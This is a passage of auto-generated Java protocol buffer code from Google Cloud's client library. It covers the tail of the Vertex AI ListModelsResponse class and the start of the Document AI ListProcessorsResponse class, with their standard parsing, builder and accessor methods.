com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.aiplatform.v1.ListModelsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? 
new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for * [ModelService.ListModels][google.cloud.aiplatform.v1.ModelService.ListModels] * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListModelsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ListModelsResponse) com.google.cloud.aiplatform.v1.ListModelsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListModelsResponse.class, com.google.cloud.aiplatform.v1.ListModelsResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1.ListModelsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (modelsBuilder_ == null) { models_ = java.util.Collections.emptyList(); } else { models_ = null; modelsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1.ModelServiceProto 
.internal_static_google_cloud_aiplatform_v1_ListModelsResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListModelsResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1.ListModelsResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1.ListModelsResponse build() { com.google.cloud.aiplatform.v1.ListModelsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListModelsResponse buildPartial() { com.google.cloud.aiplatform.v1.ListModelsResponse result = new com.google.cloud.aiplatform.v1.ListModelsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.aiplatform.v1.ListModelsResponse result) { if (modelsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { models_ = java.util.Collections.unmodifiableList(models_); bitField0_ = (bitField0_ & ~0x00000001); } result.models_ = models_; } else { result.models_ = modelsBuilder_.build(); } } private void buildPartial0(com.google.cloud.aiplatform.v1.ListModelsResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( 
com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1.ListModelsResponse) { return mergeFrom((com.google.cloud.aiplatform.v1.ListModelsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1.ListModelsResponse other) { if (other == com.google.cloud.aiplatform.v1.ListModelsResponse.getDefaultInstance()) return this; if (modelsBuilder_ == null) { if (!other.models_.isEmpty()) { if (models_.isEmpty()) { models_ = other.models_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureModelsIsMutable(); models_.addAll(other.models_); } onChanged(); } } else { if (!other.models_.isEmpty()) { if (modelsBuilder_.isEmpty()) { modelsBuilder_.dispose(); modelsBuilder_ = null; models_ = other.models_; bitField0_ = (bitField0_ & ~0x00000001); modelsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getModelsFieldBuilder() : null; } else { modelsBuilder_.addAllMessages(other.models_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.aiplatform.v1.Model m = input.readMessage( com.google.cloud.aiplatform.v1.Model.parser(), extensionRegistry); if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.add(m); } else { modelsBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.aiplatform.v1.Model> models_ = java.util.Collections.emptyList(); private void ensureModelsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { models_ = new java.util.ArrayList<com.google.cloud.aiplatform.v1.Model>(models_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Model, com.google.cloud.aiplatform.v1.Model.Builder, com.google.cloud.aiplatform.v1.ModelOrBuilder> modelsBuilder_; /** * * * <pre> * List of Models in the 
requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Model> getModelsList() { if (modelsBuilder_ == null) { return java.util.Collections.unmodifiableList(models_); } else { return modelsBuilder_.getMessageList(); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public int getModelsCount() { if (modelsBuilder_ == null) { return models_.size(); } else { return modelsBuilder_.getCount(); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model getModels(int index) { if (modelsBuilder_ == null) { return models_.get(index); } else { return modelsBuilder_.getMessage(index); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder setModels(int index, com.google.cloud.aiplatform.v1.Model value) { if (modelsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureModelsIsMutable(); models_.set(index, value); onChanged(); } else { modelsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder setModels( int index, com.google.cloud.aiplatform.v1.Model.Builder builderForValue) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.set(index, builderForValue.build()); onChanged(); } else { modelsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of Models in the requested page. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels(com.google.cloud.aiplatform.v1.Model value) { if (modelsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureModelsIsMutable(); models_.add(value); onChanged(); } else { modelsBuilder_.addMessage(value); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels(int index, com.google.cloud.aiplatform.v1.Model value) { if (modelsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureModelsIsMutable(); models_.add(index, value); onChanged(); } else { modelsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels(com.google.cloud.aiplatform.v1.Model.Builder builderForValue) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.add(builderForValue.build()); onChanged(); } else { modelsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels( int index, com.google.cloud.aiplatform.v1.Model.Builder builderForValue) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.add(index, builderForValue.build()); onChanged(); } else { modelsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addAllModels( java.lang.Iterable<? 
extends com.google.cloud.aiplatform.v1.Model> values) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, models_); onChanged(); } else { modelsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder clearModels() { if (modelsBuilder_ == null) { models_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { modelsBuilder_.clear(); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder removeModels(int index) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.remove(index); onChanged(); } else { modelsBuilder_.remove(index); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model.Builder getModelsBuilder(int index) { return getModelsFieldBuilder().getBuilder(index); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.ModelOrBuilder getModelsOrBuilder(int index) { if (modelsBuilder_ == null) { return models_.get(index); } else { return modelsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public java.util.List<? 
extends com.google.cloud.aiplatform.v1.ModelOrBuilder> getModelsOrBuilderList() { if (modelsBuilder_ != null) { return modelsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(models_); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model.Builder addModelsBuilder() { return getModelsFieldBuilder() .addBuilder(com.google.cloud.aiplatform.v1.Model.getDefaultInstance()); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model.Builder addModelsBuilder(int index) { return getModelsFieldBuilder() .addBuilder(index, com.google.cloud.aiplatform.v1.Model.getDefaultInstance()); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Model.Builder> getModelsBuilderList() { return getModelsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Model, com.google.cloud.aiplatform.v1.Model.Builder, com.google.cloud.aiplatform.v1.ModelOrBuilder> getModelsFieldBuilder() { if (modelsBuilder_ == null) { modelsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Model, com.google.cloud.aiplatform.v1.Model.Builder, com.google.cloud.aiplatform.v1.ModelOrBuilder>( models_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); models_ = null; } return modelsBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. 
* </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. 
*/ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ListModelsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ListModelsResponse) private static final com.google.cloud.aiplatform.v1.ListModelsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ListModelsResponse(); } public static com.google.cloud.aiplatform.v1.ListModelsResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListModelsResponse> PARSER = new com.google.protobuf.AbstractParser<ListModelsResponse>() { @java.lang.Override public ListModelsResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } 
catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListModelsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListModelsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListModelsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,738
java-document-ai/proto-google-cloud-document-ai-v1/src/main/java/com/google/cloud/documentai/v1/ListProcessorsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/documentai/v1/document_processor_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.documentai.v1; /** * * * <pre> * Response message for the * [ListProcessors][google.cloud.documentai.v1.DocumentProcessorService.ListProcessors] * method. * </pre> * * Protobuf type {@code google.cloud.documentai.v1.ListProcessorsResponse} */ public final class ListProcessorsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.documentai.v1.ListProcessorsResponse) ListProcessorsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListProcessorsResponse.newBuilder() to construct. 
private ListProcessorsResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListProcessorsResponse() { processors_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListProcessorsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.documentai.v1.ListProcessorsResponse.class, com.google.cloud.documentai.v1.ListProcessorsResponse.Builder.class); } public static final int PROCESSORS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.documentai.v1.Processor> processors_; /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.documentai.v1.Processor> getProcessorsList() { return processors_; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.documentai.v1.ProcessorOrBuilder> getProcessorsOrBuilderList() { return processors_; } /** * * * <pre> * The list of processors. 
* </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public int getProcessorsCount() { return processors_.size(); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public com.google.cloud.documentai.v1.Processor getProcessors(int index) { return processors_.get(index); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public com.google.cloud.documentai.v1.ProcessorOrBuilder getProcessorsOrBuilder(int index) { return processors_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. 
*/ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < processors_.size(); i++) { output.writeMessage(1, processors_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < processors_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, processors_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.documentai.v1.ListProcessorsResponse)) { return super.equals(obj); } com.google.cloud.documentai.v1.ListProcessorsResponse other = (com.google.cloud.documentai.v1.ListProcessorsResponse) obj; if (!getProcessorsList().equals(other.getProcessorsList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return 
false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getProcessorsCount() > 0) { hash = (37 * hash) + PROCESSORS_FIELD_NUMBER; hash = (53 * hash) + getProcessorsList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, 
extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.documentai.v1.ListProcessorsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public 
Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for the * [ListProcessors][google.cloud.documentai.v1.DocumentProcessorService.ListProcessors] * method. * </pre> * * Protobuf type {@code google.cloud.documentai.v1.ListProcessorsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.documentai.v1.ListProcessorsResponse) com.google.cloud.documentai.v1.ListProcessorsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.documentai.v1.ListProcessorsResponse.class, com.google.cloud.documentai.v1.ListProcessorsResponse.Builder.class); } // Construct using com.google.cloud.documentai.v1.ListProcessorsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (processorsBuilder_ == null) { processors_ = java.util.Collections.emptyList(); } else { processors_ = null; processorsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public 
